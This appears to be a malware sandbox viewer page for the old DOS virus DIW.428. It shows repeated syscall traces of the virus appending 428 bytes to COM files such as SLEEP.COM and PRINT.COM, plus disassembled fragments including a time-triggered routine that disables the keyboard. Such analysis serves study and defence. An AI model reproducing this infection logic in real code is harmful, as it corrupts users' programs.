Sample viewer

vx.netlux.org/Virus.DOS.DIW.428

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:56.188869495Z 47 PC: 12a6d | Get disk transfer address
2018-12-17T22:49:56.198691424Z 26 PC: 12a7b | Set disk transfer address
2018-12-17T22:49:56.19970392Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-17T22:49:56.201413198Z 43 PC: 12a8d | Set date
2018-12-17T22:49:56.204250405Z 78 PC: 12b25 | Find first file
2018-12-17T22:49:56.21100751Z 47 PC: 12b2b | Get disk transfer address
2018-12-17T22:49:56.218611627Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:56.226090416Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.237094143Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.238802906Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.241695611Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.245546868Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.261067317Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.270467892Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.274539367Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:56.280857253Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.287618626Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.289706Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.29300451Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.295221644Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.301202878Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.309573681Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.312583673Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:56.319742852Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.324086355Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.325181034Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.327004872Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.328397689Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.333408595Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.338653685Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.341223697Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:56.345563446Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.349529791Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.351046064Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.353143353Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.354432627Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.356931953Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.362095517Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.364337247Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:56.371937791Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.375808531Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.376680862Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.379304394Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.380420096Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.383121427Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.390915842Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.393446556Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:56.400723226Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.407102515Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.408677361Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.411347137Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.413040723Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.424741024Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.433175905Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.435681504Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:56.44028275Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.444620561Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.445764097Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.448365179Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.449594058Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.451501464Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.458605395Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.460767402Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:56.464822418Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.469582333Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.470657615Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.472465293Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.474116655Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.47926509Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.484463898Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.486818902Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-17T22:49:56.488413066Z 78 PC: 12bce | Find first file
2018-12-17T22:49:56.491917318Z 26 PC: 12aa2 | Set disk transfer address
2018-12-17T22:49:56.493622144Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.010769109Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.026358346Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.027532774Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-25T12:27:06.029619977Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.033664314Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.044040437Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.045063897Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.051994703Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.058727723Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.060040523Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.063240247Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.064597012Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.098802618Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.107618068Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.120512033Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.130445781Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.137240227Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.149075994Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.15212449Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.154186833Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.158622481Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.166138164Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.168745553Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.176245936Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.182440211Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.183822208Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.187316169Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.189627719Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.1975801Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.206940189Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.210262487Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.217102927Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.22473228Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.2265144Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.233938781Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.236540965Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.24300504Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.251825467Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.255112057Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.263162453Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.269475368Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.270931895Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.274685076Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.276168258Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.279031228Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.290961879Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.294439248Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.302191852Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.309140684Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.310786036Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.313461233Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.315385065Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.323436641Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.331523405Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.334970093Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.341619348Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.348070614Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.350515134Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.353383993Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.355000297Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.358531989Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.36684465Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.370049827Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.377727245Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.384840188Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.386392865Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.389350395Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.391720632Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.399598997Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.407446183Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.410549398Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-25T12:27:06.412960184Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.418691764Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.420925797Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.116766927Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.119574854Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.120717041Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-25T12:27:06.122798059Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.12708844Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.153463531Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.155867178Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.163137306Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.171524614Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.173743553Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.176754138Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.179528877Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.194595615Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.202532259Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.206154152Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.212516375Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.219460819Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.222170537Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.225011713Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.226637621Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.23109957Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.239019114Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.241608778Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.248551396Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.25554124Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.257462702Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.260557969Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.262836148Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.271245038Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.278995118Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.282385015Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.290628068Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.297449246Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.300242778Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.305279029Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.307119372Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.310069743Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.318500079Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.321383395Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.327563076Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.334921264Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.338304947Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.34130905Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.343896809Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.347061902Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.354921118Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.358153326Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.365750678Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.373251857Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.376524929Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.382929252Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.384267974Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.392847871Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.40121777Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.404345308Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.411334004Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.417874023Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.419339865Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.422241302Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.424726178Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.427903572Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.435817538Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.439576352Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.44677017Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.453045507Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.455453924Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.45834441Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.460044382Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.469257908Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.477827273Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.480489337Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-25T12:27:06.483800816Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.489975683Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.491880626Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":13,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.219576724Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.22105784Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.222274223Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
0x12a83: mov word ptr cs:[di + 0x10], dx
0x12a87: dec cx
0x12a88: inc dx
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21
0x12a8d: pop dx
0x12a8e: add dx, 3
0x12a91: call 0x12b1d
0x12a94: call 0x12b46
0x12a97: call 0x12ba9
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc]
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]
0x12aa6: mov dx, word ptr cs:[di + 0x10]
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21
0x12aae: mov bx, 0x100
0x12ab1: jmp bx
2018-12-25T12:27:06.224745845Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.229260183Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.24143748Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.242966675Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.24990488Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.258727965Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.260075727Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.262966901Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.26581558Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.279928511Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.295516493Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.298894199Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.305876503Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.312429681Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.315052067Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.320447515Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.328054318Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.334940699Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.345907237Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.348729215Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.356925719Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.365952581Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.367742385Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.37102846Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.374002619Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.383353191Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.39386382Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.397102795Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.404448571Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.413318688Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.414787614Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.417623349Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.419950875Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.423475011Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.43127579Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.433994543Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.44244515Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.448979466Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.450557356Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.454940754Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.456591393Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.459402394Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.468481053Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.475069057Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.482249069Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.489539236Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.491495306Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.494456979Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.497213954Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.505423695Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.513466239Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.517134191Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.523796449Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.533700508Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.535783822Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.539415071Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.541319371Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.545815524Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.555121059Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.557688638Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.565551535Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.572246828Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.57383099Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.577116579Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.579271578Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.588536601Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.601133895Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.604423164Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
0x12b55: jl 0x12b9d
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d
0x12b5c: cli
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10
0x12b73: cmp bh, 0
0x12b76: je 0x12b85
0x12b78: mov ch, 1
0x12b7a: sub bh, 1
2018-12-25T12:27:06.765659499Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.771600192Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.773590127Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.29234589Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.294085872Z 26 PC: 12a7b | Set disk transfer address
